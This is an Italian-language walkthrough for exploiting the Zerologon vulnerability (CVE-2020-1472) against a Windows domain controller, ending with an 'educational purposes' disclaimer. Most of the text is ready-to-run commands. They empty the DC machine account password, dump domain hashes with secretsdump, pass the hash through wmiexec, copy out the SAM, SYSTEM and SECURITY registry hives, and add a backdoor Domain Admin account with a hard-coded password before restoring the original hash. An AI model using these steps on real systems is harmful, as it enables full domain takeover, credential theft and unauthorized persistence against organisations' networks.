
script zerologon per sfruttare CVE-2020-1472 CVSS 10/10
script zerologon per sfruttare CVE-2020-1472 CVSS 10/10 Codice exploit basato su https://www.secura.com/blog/zero-logon e https://github.com/SecuraBV/CVE-2020-1472. Ricerca e scanner originali di Secura, modifiche di RiskSense Inc. https://github.com/risksense/zerologon
Per sfruttare la vulnerabilità, rimuovi tutte le installazioni precedenti di Impacket e installa Impacket dal commit https://github.com/SecureAuthCorp/impacket/commit/b867b21 o successivo.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Poi, esegui:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Se ha successo, potrai poi eseguire:
sudo secretsdump.py -just-dc domain/hostname\$@ip
premendo "Enter" alla richiesta della password potrai passare, il che dovrebbe darti l'hash di Domain Admin. Dopo averlo ottenuto, usa wmiexec.py verso il DC di destinazione con una credenziale ricavata dal secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
ed esegui
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
E poi puoi creare un nuovo account Admin per sicurezza,
net user myadmin Hello1234 /ADD /DOMAIN
e aggiungi il nuovo account al gruppo Domain Admins per ottenere tutti i privilegi,
net group "Domain Admins" myadmin /ADD /DOMAIN
e probabilmente esegui exit ora da C:>
Poi puoi eseguire
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
E questo dovrebbe mostrarti l'hash NT originale dell'account macchina. Puoi quindi reinstallare l'hash originale dell'account macchina nel dominio con
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Reinstallare l'hash originale è necessario affinché il DC continui a funzionare normalmente.
E solo per assicurarti che il processo di ripristino abbia funzionato,
sudo secretsdump.py -just-dc domain/hostname\$@ip
e premendo "Enter" alla richiesta della password non funzionerà più.
E qui abbiamo finito.
Buona caccia.
DICHIARAZIONE DI NON RESPONSABILITÀ: Questo è puramente a scopo educativo, non sarò ritenuto responsabile per alcuna azione o per le loro conseguenze ENTRARE ILLEGALMENTE NEI DISPOSITIVI ALTRUI È ILLEGALE ED È PUNITO DALLA LEGGE.